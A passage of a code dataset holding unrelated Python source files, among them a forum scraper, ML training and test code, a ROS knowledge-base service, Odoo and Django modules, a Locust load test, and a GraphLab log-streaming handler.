board...\".format(\n board['num_pages']))\n\nresult = []\n\nfor boardPageNum in range(1, board['num_pages'] + 1):\n logging.info(\">Scraping page {0}...\".format(boardPageNum))\n topics = memoizer.scrapeBoardTopics(boardId, boardPageNum)\n for topic in topics:\n creator = memoizer.scrapeMember(topic['creatorId'])\n result.append({\"id\": topic['id'], \"name\": topic['name'], \"creator\":creator})\n print(result)\n\nlogging.info(\"All done.\")\nlogging.info(\"Made {0} requests in total.\".format(bitcointalk.countRequested))\n","sub_path":"scrape_boards.py","file_name":"scrape_boards.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"379997805","text":"fator = int(input(\"Digite um numero para calcular o seu fatorial: \"))\n\nacumu = fator\nmulti = 1\n\nprint(\"Fatorial {}! = \".format(fator), end='')\n\nwhile acumu > 0:\n print(\"{}\".format(acumu), end=\"\")\n print(\" x \" if acumu > 1 else ' = ', end='')\n multi *= acumu\n acumu -= 1\nprint(multi)\n","sub_path":"WHILE/Calculando_Fatorial2.0.py","file_name":"Calculando_Fatorial2.0.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"200536211","text":"import numpy as np\nfrom pytorch_lightning import seed_everything\n\nfrom pl_bolts.datamodules.sklearn_datamodule import SklearnDataModule\nfrom warnings import warn\n\ntry:\n from sklearn.utils import shuffle as sk_shuffle\nexcept ImportError:\n warn('You want to use `sklearn` which is not installed yet,' # pragma: no-cover\n ' install it with `pip install sklearn`.')\n\n\ndef test_dataloader(tmpdir):\n seed_everything()\n\n X = np.random.rand(5, 2)\n y = np.random.rand(5)\n x_val = np.random.rand(2, 2)\n y_val = np.random.rand(2)\n x_test = np.random.rand(1, 2)\n y_test = np.random.rand(1)\n\n shuffled_X, shuffled_y = sk_shuffle(X, y, random_state=1234)\n\n # -----------------------------\n # train\n # -----------------------------\n loaders = SklearnDataModule(X=X, y=y, val_split=0.2, test_split=0.2, random_state=1234)\n train_loader = loaders.train_dataloader()\n val_loader = loaders.val_dataloader()\n test_loader = loaders.test_dataloader()\n assert np.all(train_loader.dataset.X == shuffled_X[2:])\n assert np.all(val_loader.dataset.X == shuffled_X[0])\n assert np.all(test_loader.dataset.X == shuffled_X[1])\n assert np.all(train_loader.dataset.Y == shuffled_y[2:])\n\n # -----------------------------\n # train + val\n # -----------------------------\n loaders = SklearnDataModule(X=X, y=y, x_val=x_val, y_val=y_val, test_split=0.2, random_state=1234)\n train_loader = loaders.train_dataloader()\n val_loader = loaders.val_dataloader()\n test_loader = loaders.test_dataloader()\n assert np.all(train_loader.dataset.X == shuffled_X[1:])\n assert np.all(val_loader.dataset.X == x_val)\n assert np.all(test_loader.dataset.X == shuffled_X[0])\n\n # -----------------------------\n # train + test\n # -----------------------------\n loaders = SklearnDataModule(X=X, y=y, x_test=x_test, y_test=y_test, val_split=0.2, random_state=1234)\n train_loader = loaders.train_dataloader()\n val_loader = loaders.val_dataloader()\n test_loader = loaders.test_dataloader()\n assert np.all(train_loader.dataset.X == shuffled_X[1:])\n assert np.all(val_loader.dataset.X == shuffled_X[0])\n assert np.all(test_loader.dataset.X == x_test)\n\n # -----------------------------\n # train + val + test\n # -----------------------------\n loaders = SklearnDataModule(X, y, x_val, y_val, x_test, y_test, random_state=1234)\n train_loader = loaders.train_dataloader()\n val_loader = loaders.val_dataloader()\n test_loader = loaders.test_dataloader()\n assert np.all(train_loader.dataset.X == shuffled_X)\n assert np.all(val_loader.dataset.X == x_val)\n assert np.all(test_loader.dataset.X == x_test)\n","sub_path":"tests/datamodules/test_sklearn_dataloaders.py","file_name":"test_sklearn_dataloaders.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"504581184","text":"user_list = [\r\n {'name': 'zhangsan', 'tel': '123', 'qq': '321'},\r\n {'name': 'lisi', 'tel': '666', 'qq': '999'},\r\n {'name': 'jack', 'tel': '888', 'qq': '233'}\r\n]\r\n\r\n\r\ndef add_user():\r\n name = input('请输入用户名:')\r\n for u in user_list:\r\n if u['name'] == name:\r\n print('用户名已经被占用')\r\n break\r\n else:\r\n tel = input('请输入手机号:')\r\n qq = input('请输入QQ号:')\r\n user = {'name': name, 'tel': tel, 'qq': qq}\r\n user_list.append(user)\r\n print(user_list)\r\n\r\n\r\ndef check_number(n):\r\n if n.isdigit():\r\n n = int(n)\r\n if 0 <= n < len(user_list):\r\n return True\r\n return False\r\n\r\n\r\ndef del_user():\r\n number = input('请输入要删除的序号(序号从0开始):')\r\n is_valid = check_number(number)\r\n if is_valid:\r\n answer = input('你确定要删除么?yes or no: ')\r\n if answer.lower() == 'yes':\r\n user_list.pop(int(number))\r\n else:\r\n print('输入的序号不合法')\r\n\r\n print(user_list)\r\n\r\n\r\ndef modify_user():\r\n number = input('请输入要修改的序号(序号从0开始):')\r\n if check_number(number):\r\n user = user_list[int(number)]\r\n # print('您要修改的信息是:\\n姓名:{},手机号:{},QQ号:{}'.format(user['name'], user['tel'], user['qq']))\r\n print('您要修改的信息是:\\n姓名:{name},手机号:{tel},QQ号:{qq}'.format(**user))\r\n new_name = input('请输入新的姓名:')\r\n for u in user_list:\r\n if u['name'] == new_name:\r\n print('新用户名已经存在')\r\n modify_user()\r\n return\r\n else:\r\n new_tel = input('请输入新的手机号:')\r\n new_qq = input('请输入新的QQ号:')\r\n if new_name == user['name'] and new_tel == user['tel'] and new_qq == user['qq']:\r\n print('信息未修改')\r\n else:\r\n user['name'] = new_name\r\n user['tel'] = new_tel\r\n user['qq'] = new_qq\r\n\r\n\r\ndef search_user():\r\n print('查询用户')\r\n\r\n\r\ndef show_all():\r\n print('显示所有名片')\r\n\r\n\r\ndef exit_system():\r\n answer = input('亲, 你确定要退出么?~~~~(> _ <)~~~~(yes or no)')\r\n return answer.lower() == 'yes'\r\n\r\n\r\ndef start():\r\n while True:\r\n print(\r\n \"---------------------------\\n名片管理系统 V1.0\\n1:添加名片\\n2:删除名片\\n3:修改名片\\n4:查询名片\\n5:显示所有名片\\n6:退出系统\\n---------------------------\")\r\n operator = input('请输入要进行的操作(数字):')\r\n if operator == '1':\r\n add_user()\r\n elif operator == '2':\r\n del_user()\r\n elif operator == '3':\r\n modify_user()\r\n elif operator == '4':\r\n search_user()\r\n elif operator == '5':\r\n show_all()\r\n elif operator == '6':\r\n is_sure = exit_system()\r\n if is_sure:\r\n break\r\n else:\r\n print('您输入的不合法,请重新输入')\r\n\r\n\r\nif __name__ == '__main__':\r\n start()\r\n","sub_path":"Python工程师/1 Python入门/Day16-名片管理系统/01-代码/05-名片管理系统(修改用户).py","file_name":"05-名片管理系统(修改用户).py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"309158776","text":"\n\nfrom xai.brain.wordbase.nouns._cornice import _CORNICE\n\n#calss header\nclass _CORNICES(_CORNICE, ):\n\tdef __init__(self,): \n\t\t_CORNICE.__init__(self)\n\t\tself.name = \"CORNICES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"cornice\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_cornices.py","file_name":"_cornices.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"543822612","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import Dataset, DataLoader\nimport numpy as np\nimport math\nfrom dataloader import *\nfrom utility import *\n\n\nclass Net(nn.Module):\n def __init__(self, n_feature, n_hidden1, n_hidden2, n_hidden3, n_hidden4, n_hidden5, n_hidden6, n_hidden7,\n n_hidden8, n_hidden9, n_hidden10, n_hidden11, n_output):\n super(Net, self).__init__()\n self.hidden1 = nn.Linear(n_feature, n_hidden1)\n self.hidden2 = nn.Linear(n_hidden1, n_hidden2)\n self.hidden3 = nn.Linear(n_hidden2, n_hidden3)\n self.hidden4 = nn.Linear(n_hidden3, n_hidden4)\n self.hidden5 = nn.Linear(n_hidden4, n_hidden5)\n self.hidden6 = nn.Linear(n_hidden5, n_hidden6)\n self.hidden7 = nn.Linear(n_hidden6, n_hidden7)\n self.hidden8 = nn.Linear(n_hidden7, n_hidden8)\n self.hidden9 = nn.Linear(n_hidden8, n_hidden9)\n self.hidden10 = nn.Linear(n_hidden9, n_hidden10)\n self.hidden11 = nn.Linear(n_hidden10, n_hidden11)\n # self.hidden12 = nn.Linear(n_hidden11, n_hidden12)\n self.out = nn.Linear(n_hidden11, n_output)\n\n def forward(self, x):\n x = F.relu(self.hidden1(x))\n x = F.relu(self.hidden2(x))\n x = F.relu(self.hidden3(x))\n x = F.relu(self.hidden4(x))\n x = F.relu(self.hidden5(x))\n x = F.relu(self.hidden6(x))\n x = F.relu(self.hidden7(x))\n x = F.relu(self.hidden8(x))\n x = F.relu(self.hidden9(x))\n x = F.relu(self.hidden10(x))\n x = F.relu(self.hidden11(x))\n # x = F.relu(self.hidden12(x))\n return self.out(x)\n\n\ndef main():\n import os\n home = os.path.expanduser(\"~\")\n data_temp = \"compDelta1-7.txt\"\n data_path = os.path.join(home, data_temp)\n model_temp = \"deltaRegresssModel1-7\"\n model_name = model_temp + \".txt\"\n\n model = Net(14, 512, 512, 512, 512, 512, 512, 512, 512, 512, 512, 512, 1)\n # torch.save(model.state_dict(), model_name)\n print(\"done\")\n\n data = Data(data_path, [1, 2, 3, 4, 5, 6, 7], 11520)\n print(\"loading\", data_path)\n data.load()\n print(\"done.\")\n\n device = torch.device(\"cuda:1\" if torch.cuda.is_available() else \"cpu\")\n\n optimizer = torch.optim.Adam(model.parameters(), lr=1e-4)\n # loss_fn = nn.CrossEntropyLoss()\n loss_fn = my_loss\n # loss_fn = nn.MSELoss()\n\n # if torch.cuda.device_count() > 1:\n # \tprint(torch.cuda.device_count(), \"GPUs\")\n # model = nn.DataParallel(model)\n\n model.to(device)\n\n # print(\"loading data ...\")\n # features, labels = readSplitPDB(data_name, [1,2,3,4,5,6,7], split, nth)\n # features = features.to(device)\n # labels = labels.to(device)\n # print(\"done\")\n\n data_size = len(data.label)\n num_batches = data_size // data.batch_size\n num_batches = 100\n\n for epoch in range(1):\n for i in range(num_batches):\n x, y = data.get_batch()\n x = x.to(device)\n y = y.to(device)\n out = model(x).squeeze()\n loss = loss_fn(out, y)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if i % 10 == 0:\n # torch.save(model.state_dict(), model_name)\n print(loss, i)\n data.reshuffle()\n\n\n# for i in range(1000000000):\n# \tout = model(features)\n# \tloss = loss_fn(out, labels)\n# \toptimizer.zero_grad()\n# \tloss.backward()\n# \toptimizer.step()\n# \tif i % 1000 == 0:\n# \t\ttorch.save(model.state_dict(), model_name)\n# \t\tprint(loss, i)\n\n# output = model(x)\n# _ , prediction = torch.max(output, 1)\n# accu = getAccuracy(prediction, y)\n# print(accu)\n# print(prediction == y)\n\n# torch.save(model.state_dict(), \"test.txt\")\n# model = model.to('cpu')\n# torch.save(model.state_dict(), \"modelcpu.txt\")\n# for i in range(len(temp)):\n# \tprint(temp[i])\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"regress.py","file_name":"regress.py","file_ext":"py","file_size_in_byte":3874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"563687753","text":"import sys\n\ntry:\n import rospy\nexcept ImportError:\n print(\n \"Unable to load the ROS support. You might want to run with --no-ros\"\n \" to use KnowledgeCore without ROS support enabled.\"\n )\n sys.exit(1)\n\nimport json\n\nfrom knowledge_core.exceptions import KbServerError\n\nfrom knowledge_core.srv import Manage, Revise, Query, Sparql\nfrom std_msgs.msg import String\n\n\nclass KnowledgeCoreROS:\n def __init__(self, kb):\n self.kb = kb\n\n rospy.init_node(\"knowledge_core\", disable_signals=True)\n self.services = {\n \"manage\": rospy.Service(\"kb/manage\", Manage, self.handle_manage),\n \"revise\": rospy.Service(\"kb/revise\", Revise, self.handle_revise),\n \"query\": rospy.Service(\"kb/query\", Query, self.handle_query),\n \"sparql\": rospy.Service(\"kb/sparql\", Sparql, self.handle_sparql),\n }\n\n self.update_sub = rospy.Subscriber(\"/kb/add_fact\", String, self.on_update_fact)\n self.retract_sub = rospy.Subscriber(\n \"/kb/remove_fact\", String, self.on_retract_fact\n )\n\n rospy.loginfo(\n \"\"\"\nKnowledgeCore\n=============\n\nKnowledge base started.\n\nAvailable topics:\n- /kb/add_fact [std_msgs/String]\n- /kb/remove_fact [std_msgs/String]\n\nAvailable services:\n- /kb/manage [knowledge_core/Manage]\n- /kb/revise [knowledge_core/Revise]\n- /kb/query [knowledge_core/Query]\n- /kb/sparql [knowledge_core/Sparql]\n\n\nAvailable action servers:\n- /kb/events [knowledge_core/Events]\n\n\"\"\"\n )\n\n def handle_manage(self, req):\n\n from knowledge_core.srv import ManageResponse, ManageRequest\n\n try:\n if req.action == ManageRequest.CLEAR:\n self.kb.clear()\n return ManageResponse(success=True, error_msg=\"\")\n\n elif req.action == ManageRequest.LOAD:\n if len(req.parameters) != 1:\n return ManageResponse(\n success=False,\n error_msg=\"'load' expects 'parameters' to contain exactly one URI pointing to the ontology to load\",\n )\n self.kb.load(req.parameters[0], models=req.models)\n return ManageResponse(success=True, error_msg=\"\")\n\n elif req.action == ManageRequest.STATUS:\n status = {\n \"name\": self.kb.hello(),\n \"version\": self.kb.version(),\n \"reasoning_enabled\": self.kb.reasoner_enabled,\n }\n return ManageResponse(\n success=True, json=json.dumps(status), error_msg=\"\"\n )\n else:\n return ManageResponse(\n success=False, error_msg=\"Unknown 'manage' action: %s\" % req.action\n )\n except KbServerError as kbe:\n return ManageResponse(success=False, error_msg=str(kbe))\n\n def handle_revise(self, req):\n\n from knowledge_core.srv import ReviseResponse\n\n policy = {\"method\": req.method, \"models\": req.models}\n try:\n self.kb.revise(req.statements, policy)\n\n return ReviseResponse(success=True, error_msg=\"\")\n except KbServerError as kbe:\n return ReviseResponse(success=False, error_msg=str(kbe))\n\n def handle_query(self, req):\n\n from knowledge_core.srv import QueryResponse\n\n try:\n res = self.kb.find(req.patterns, req.vars, req.models)\n return QueryResponse(success=True, error_msg=\"\", json=json.dumps(res))\n except KbServerError as kbe:\n return QueryResponse(success=False, error_msg=str(kbe))\n\n def handle_sparql(self, req):\n\n from knowledge_core.srv import SparqlResponse\n\n try:\n res = self.kb.sparql(req.query, req.models)\n return SparqlResponse(success=True, error_msg=\"\", json=json.dumps(res))\n except KbServerError as kbe:\n return SparqlResponse(success=False, error_msg=str(kbe))\n\n def on_update_fact(self, msg):\n self.kb.update([msg.data])\n\n def on_retract_fact(self, msg):\n self.kb.remove([msg.data])\n\n def shutdown(self):\n\n rospy.signal_shutdown(\"KnowledgeCore closing\")\n","sub_path":"src/knowledge_core/knowledge_core_ros.py","file_name":"knowledge_core_ros.py","file_ext":"py","file_size_in_byte":4204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"222924525","text":"from django.conf.urls import url, include\nfrom api.models import Post\nfrom rest_framework import routers, serializers, viewsets\nfrom . import views\nfrom rest_framework_jwt.views import obtain_jwt_token\n\n# Serializers define the API representation.\nclass PostSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = Post\n fields = ('id', 'title', 'content', 'published_date', 'status')\n\n# ViewSets define the view behavior.\nclass PostViewSet(viewsets.ModelViewSet):\n queryset = Post.objects.all()\n serializer_class = PostSerializer\n\n# Routers provide an easy way of automatically determining the URL conf.\nrouter = routers.DefaultRouter()\nrouter.register(r'posts', PostViewSet)\n\nurlpatterns = [\n url(r'^', include(router.urls)),\n url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n url(r'^$', views.index, name='index'),\n url(r'^api-token-auth/', obtain_jwt_token),\n\n]\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"526400472","text":"# -*- coding: utf-8 -*-\nfrom odoo import api, fields, models\n\n\nclass MrpProduction(models.Model):\n _inherit = 'mrp.production'\n\n @api.model\n def _compute_default_routing(self):\n for production in self:\n if production.bom_id.routing_id.operation_ids:\n production.routing_id = production.bom_id.routing_id.id\n else:\n production.routing_id = False\n\n routing_id = fields.Many2one(\n 'mrp.routing', string='Routing', default=_compute_default_routing,\n help=\"The list of operations (list of work centers) to produce the finished product. The routing \"\n \"is mainly used to compute work center costs during operations and to plan future loads on \"\n \"work centers based on production planning.\")\n\n inventory_posted = fields.Boolean('Inventory posted', default=False)\n\n bom_id = fields.Many2one(\n 'mrp.bom', 'Bill of Material', track_visibility='onchange',\n readonly=True, states={'confirmed': [('readonly', False)]},\n help=\"Bill of Materials allow you to define the list of required raw materials to make a finished product.\")\n\n picking_type_id = fields.Many2one(\n 'stock.picking.type', 'Operation Type', track_visibility='onchange',\n default=lambda self: self._get_default_picking_type(), required=True)\n\n @api.multi\n def post_inventory(self):\n res = super(MrpProduction, self).post_inventory()\n for order in self:\n order.inventory_posted = True\n return res\n\n @api.onchange('bom_id')\n def change_route(self):\n for production in self:\n if production.bom_id.routing_id.operation_ids:\n production.routing_id = production.bom_id.routing_id.id\n else:\n production.routing_id = False\n\n @api.multi\n def write(self, values):\n res = super(MrpProduction, self).write(values)\n for order in self:\n if 'bom_id' in values or 'picking_type_id' in values:\n self.move_raw_ids._action_cancel()\n self.move_finished_ids._action_cancel()\n self.move_raw_ids.unlink()\n self.move_finished_ids.unlink()\n self.picking_ids.action_cancel()\n self._generate_moves()\n\n elif 'product_qty' in values and 'bom_id' not in values and 'picking_type_id' not in values:\n for picking in order.picking_ids:\n for move in picking.move_ids_without_package:\n # finished product\n if move.product_id == order.product_id:\n if order.bom_id.product_qty == 1:\n move.write({'product_uom_qty': values['product_qty']})\n elif order.bom_id.product_qty > 1:\n move.write({'product_uom_qty': values['product_qty'] / order.bom_id.product_qty})\n # component\n for bom_line in order.bom_id.bom_line_ids:\n if bom_line.product_id == move.product_id:\n if order.bom_id.product_qty == 1:\n move.write({'product_uom_qty': values['product_qty'] * bom_line.product_qty})\n elif order.bom_id.product_qty > 1:\n move.write({'product_uom_qty': (values[\n 'product_qty'] * bom_line.product_qty) / order.bom_id.product_qty})\n\n return res\n","sub_path":"bi_mrp_customization/models/mrp_production_inherit.py","file_name":"mrp_production_inherit.py","file_ext":"py","file_size_in_byte":3615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"577411636","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nfrom isthai import isThai\nimport PyICU\n# ตัดคำภาษาไทย\ndef segment(txt):\n \"\"\"รับค่า ''str'' คืนค่าออกมาเป็น ''list'' ที่ได้มาจากการตัดคำโดย ICU\"\"\"\n bd = PyICU.BreakIterator.createWordInstance(PyICU.Locale(\"th\"))\n bd.setText(txt)\n lastPos = bd.first()\n retTxt = \"\"\n try:\n while(1):\n currentPos = next(bd)\n retTxt += txt[lastPos:currentPos]\n if(isThai(txt[currentPos-1])):\n if(currentPos < len(txt)):\n if(isThai(txt[currentPos])):\n retTxt += ','\n lastPos = currentPos\n except StopIteration:\n pass\n return retTxt.split(',')\nif __name__ == \"__main__\":\n\tprint(segment('ทดสอบระบบตัดคำด้วยไอซียู'))\n","sub_path":"pythainlp/segment/pyicu.py","file_name":"pyicu.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"640106951","text":"from scipy.sparse.csgraph import shortest_path\nimport numpy as np\nN,M=map(int,input().split())\nabc = [tuple(map(int,input().split())) for i in range(M)]\ng = [[10**9]*N for i in range(N)]\nfor a,b,c in abc:\n a,b = a-1,b-1\n g[a][b]=c\n g[b][a]=c\ng = np.array(g)\nG,P=shortest_path(g,return_predecessors=True)\nans=set()\nfor i in range(N):\n for j in range(N):\n if P[i][j]>0 and (P[i][j],j) not in ans:\n ans.add((j,P[i][j]))\n\nprint(M-len(ans))","sub_path":"Python_codes/p03837/s665916474.py","file_name":"s665916474.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"89153113","text":"from locust import HttpUser, task, events, between\nfrom dotenv import load_dotenv\nimport os, random\n\nload_dotenv() # load env variables\n\n@events.test_start.add_listener\ndef on_test_start(environment, **kwargs):\n print(\"A new test is starting\")\n\n@events.test_stop.add_listener\ndef on_test_stop(environment, **kwargs):\n print(\"A new test is ending\")\n\nclass MutlipleSurveyUser(HttpUser):\n rw = int(os.getenv('multiple_survey_render_weight')) if os.getenv('multiple_survey_render_weight') else 1\n sw1 = int(os.getenv('mutiple_survey1_submit_weight')) if os.getenv('mutiple_survey1_submit_weight') else 1\n sw2 = int(os.getenv('mutiple_survey2_submit_weight')) if os.getenv('mutiple_survey2_submit_weight') else 1\n sw3 = int(os.getenv('mutiple_survey3_submit_weight')) if os.getenv('mutiple_survey3_submit_weight') else 1\n sw4 = int(os.getenv('mutiple_survey4_submit_weight')) if os.getenv('mutiple_survey4_submit_weight') else 1\n \n params = {\n 'random_int': 5,\n 'random_string': 'abcdef',\n 'random_name': 'Jeff',\n 'submit-action': 'submit-btn-saverecord'\n }\n\n def submit(self, uri, name):\n with self.client.post(uri, self.params, catch_response=True, name=name) as response: \n if response.status_code == 200:\n response.success()\n else:\n response.failure()\n\n @task(sw1)\n def submit_public_survey1(self):\n print(\"submitting multiple survey ... \")\n self.submit(os.getenv('multiple_public_survey_url1'), 'Multiple Survey 1 submission')\n \n @task(sw2)\n def submit_public_survey2(self):\n print(\"submitting multiple survey 2 ... \")\n self.submit(os.getenv('multiple_public_survey_url2'), 'Multiple Survey 2 submission')\n\n \n @task(sw3)\n def submit_public_survey3(self):\n print(\"submitting multiple survey 3 ... \")\n self.submit(os.getenv('multiple_public_survey_url3'), 'Multiple Survey 3 submission')\n\n\n @task(sw4)\n def submit_public_survey4(self):\n print(\"submitting multiple survey 4 ... \")\n self.submit(os.getenv('multiple_public_survey_url4'), 'Multiple Survey 4 submission')\n\n @task(rw) # render 5 times as often\n def render_public_survey(self):\n choices = [\n os.getenv('multiple_public_survey_url1'),\n os.getenv('multiple_public_survey_url2'),\n os.getenv('multiple_public_survey_url3'),\n os.getenv('multiple_public_survey_url4')\n ]\n \n choice = random.randint(0,3)\n \n print(f\"rendering multiple survey ... {choice + 1}\")\n \n self.client.get(choices[choice], name='Multiple survey render')\n\n wait_time = between(1, 3)","sub_path":"locus_scripts/MutlipleSurveys.py","file_name":"MutlipleSurveys.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"137528203","text":"class TreeNode:\n def __init__(self, value, left=None, right=None):\n self.value = value\n self.left = left\n self.right = right\n\n\ndef find(value, this_node):\n if this_node is None:\n return None\n elif this_node.value == value:\n return this_node\n else:\n res = find(value, this_node.left)\n if res is None:\n res = find(value, this_node.right)\n return res\n\n\nn, root_value = [int(x) for x in input().split()]\ninfo = [] # 结点信息\nfor i in range(n):\n info.append([int(x) for x in input().split()])\nroot = TreeNode(root_value)\n\n\ndef make_tree(node):\n lch = 0\n rch = 0\n for each in info:\n if each[0] == node.value:\n lch = each[1]\n rch = each[2]\n break\n if lch != 0:\n node.left = make_tree(TreeNode(lch))\n if rch != 0:\n node.right = make_tree(TreeNode(rch))\n return node\n\n\ndef dfs(value1, value2, node):\n if node is None:\n return None\n elif node.value == value1 or node.value == value2:\n return node\n elif find(value1, node.left) is not None and find(value2, node.left) is not None:\n return dfs(value1, value2, node.left)\n elif find(value1, node.right) is not None and find(value2, node.right) is not None:\n return dfs(value1, value2, node.right)\n else:\n return node\n\n\nroot = make_tree(root)\nm = int(input())\nans = []\nfor i in range(m):\n node1, node2 = [int(x) for x in input().split()]\n ans.append(dfs(node1, node2, root).value)\nfor i in ans:\n print(i)\n","sub_path":"Code/CodeRecords/2302/60675/310084.py","file_name":"310084.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"416657564","text":"\"\"\"\n Server Side Event Handler for emitting messages from tailed log files.\n\"\"\"\n\n# encoding: utf-8\nimport uuid\nimport tornado.web\nimport tornado.escape\nimport os as _os\nimport six\n\nimport graphlab.deploy\n\nSSE_HEADERS = (\n ('Content-Type','text/event-stream; charset=utf-8'),\n ('Cache-Control','no-cache'),\n ('Connection','keep-alive'),\n ('Access-Control-Allow-Origin', '*'),\n)\n\n# SSE \"protocol\" is described here: http://mzl.la/UPFyxY\nclass ServerSentEvent(object):\n\n def __init__(self, data, event=None, id=None):\n self.data = data\n self.event = event\n self.id = id\n self.desc_map = {\n self.data : \"data\",\n self.event : \"event\",\n self.id : \"id\"\n }\n\n def encode(self):\n if not self.data:\n return \"\"\n lines = [\"%s: %s\" % (v, k)\n for k, v in six.iteritems(self.desc_map) if k]\n\n return \"%s\\n\\n\" % \"\\n\".join(lines)\n\nclass SSEHandler(tornado.web.RequestHandler):\n \"\"\"\n URL route expects an object id to be passed in as the first parameter\n to the get handler\n\n specified object id is validated before stream connection is started\n \"\"\"\n\n _connections = {}\n _source = None\n\n def __init__(self, application, request, **kwargs):\n super(SSEHandler, self).__init__(application, request, **kwargs)\n self.stream = request.connection.stream\n self._closed = False\n\n def set_default_headers(self):\n for name, value in SSE_HEADERS:\n self.set_header(name, value)\n\n def get_class(self):\n return self.__class__\n\n def get_source(self, *args):\n return None\n\n def listen(self, source):\n return None\n\n @tornado.web.asynchronous\n def get(self, obj_id):\n # validate id\n self._source = self.get_source(obj_id)\n # abort connection if invalid id\n if not self._source:\n self.set_status(403)\n self.finish()\n else:\n # Sending the standard headers: open event\n self.on_open()\n\n def on_open(self, *args, **kwargs):\n \"\"\" Invoked for a new connection opened. \"\"\"\n self.listen(self._source)\n\n def on_close(self):\n \"\"\" Invoked when the connection for this instance is closed. \"\"\"\n pass\n\n def on_connection_close(self):\n \"\"\" Closes the connection for this instance \"\"\"\n self.on_close()\n self.stream.close()\n\n def send_message(self, data):\n \"\"\" Sends a message to all live connections \"\"\"\n msg_id = str(uuid.uuid4())\n event = 'message'\n\n sse = ServerSentEvent(data, event, msg_id)\n message = sse.encode()\n\n self.on_message(message)\n\n def on_message(self, message):\n self.write(message)\n self.flush()\n\n\nclass LogSSEHandler(SSEHandler):\n \"\"\"\n Stream messages from log file as it is being written to\n \"\"\"\n line_terminators = ('\\r\\n', '\\n', '\\r')\n\n def __init__(self, application, request, **kwargs):\n super(LogSSEHandler, self).__init__(application, request, **kwargs)\n self._file_handle = None\n self._periodic_task = None\n\n # return the job log file path, if available\n # otherwise, return None. Connection will be closed.\n def get_source(self, job_id):\n try:\n job_obj = graphlab.deploy.jobs[job_id]\n except KeyError:\n return None\n\n job_log_file = job_obj.get_log_file_path()\n return job_log_file\n\n\n # close file handle and periodic callbacks\n def on_close(self):\n \"\"\" Invoked when the connection for this instance is closed. \"\"\"\n # close log file if it has been opened\n if self._file_handle is not None:\n try:\n self._file_handle.close()\n except:\n pass\n # end periodic callback if it has been created\n if self._periodic_task is not None:\n try:\n self._periodic_task.stop()\n except:\n pass\n\n # asynchronous writes of log file messages.\n # generator exits when log file is closed and all\n # messages have been sent\n @tornado.web.asynchronous\n def listen(self, log_file_path):\n for line in self.__last_lines_of_file(log_file_path, 1000):\n self.send_message(line)\n\n self.__open_log_file_at_end(log_file_path)\n\n #start periodic callback to tail file\n self._periodic_task = tornado.ioloop.PeriodicCallback(self.__follow_file_async, 3000)\n self._periodic_task.start()\n\n def __open_log_file_at_end(self, log_file_path):\n fsize = _os.stat(log_file_path).st_size\n self._file_handle = open(log_file_path, 'rb')\n self._file_handle.seek(fsize)\n\n # generator that yields\n # the last 1000 lines of a log file\n # all following lines until the file is terminated\n @tornado.web.asynchronous\n def __last_lines_of_file(self, log_file, lines=1000):\n bufsize = 8192\n fsize = _os.stat(log_file).st_size\n\n with open(log_file, 'rb') as f:\n #limit buffer size to file size\n if bufsize > fsize:\n bufsize = fsize-1\n position = fsize\n data = []\n while True:\n position -= bufsize\n bufsize *= 2\n if position < 0:\n position = 0\n f.seek(position)\n data = f.readlines()\n # quit reading if we have read enough lines\n # or we are at the beginning of the file\n if len(data) >= lines or position == 0 or bufsize > 131072:\n break\n\n # send out last (up to) 1000 lines\n for line in data[-lines:]:\n yield line\n\n def __follow_file_async(self):\n ### start tailing log\n trailing = True\n while True:\n where = self._file_handle.tell()\n line = self._file_handle.readline()\n if line:\n if trailing and line in self.line_terminators:\n # This is just the line terminator added to the end of the file\n # before a new line, ignore.\n trailing = False\n continue\n\n if line[-1] in self.line_terminators:\n line = line[:-1]\n if line[-1:] == '\\r\\n' and '\\r\\n' in self.line_terminators:\n # found crlf\n line = line[:-1]\n\n trailing = False\n # send out new lines\n self.send_message(line)\n else:\n # preserve file position and return\n self._file_handle.seek(where)\n break\n","sub_path":"env/lib/python2.7/site-packages/graphlab/canvas/log_stream_handler.py","file_name":"log_stream_handler.py","file_ext":"py","file_size_in_byte":6779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"377294348","text":"\"\"\"\nSubscribe all registered OSF users to the 'Open Science Framework General'\nmailing list on mailchimp. From the API docs:\n\n1. Grab the users to be updated or created\n2. For each user's status, sort them into two batches:\n Users to be subscribed 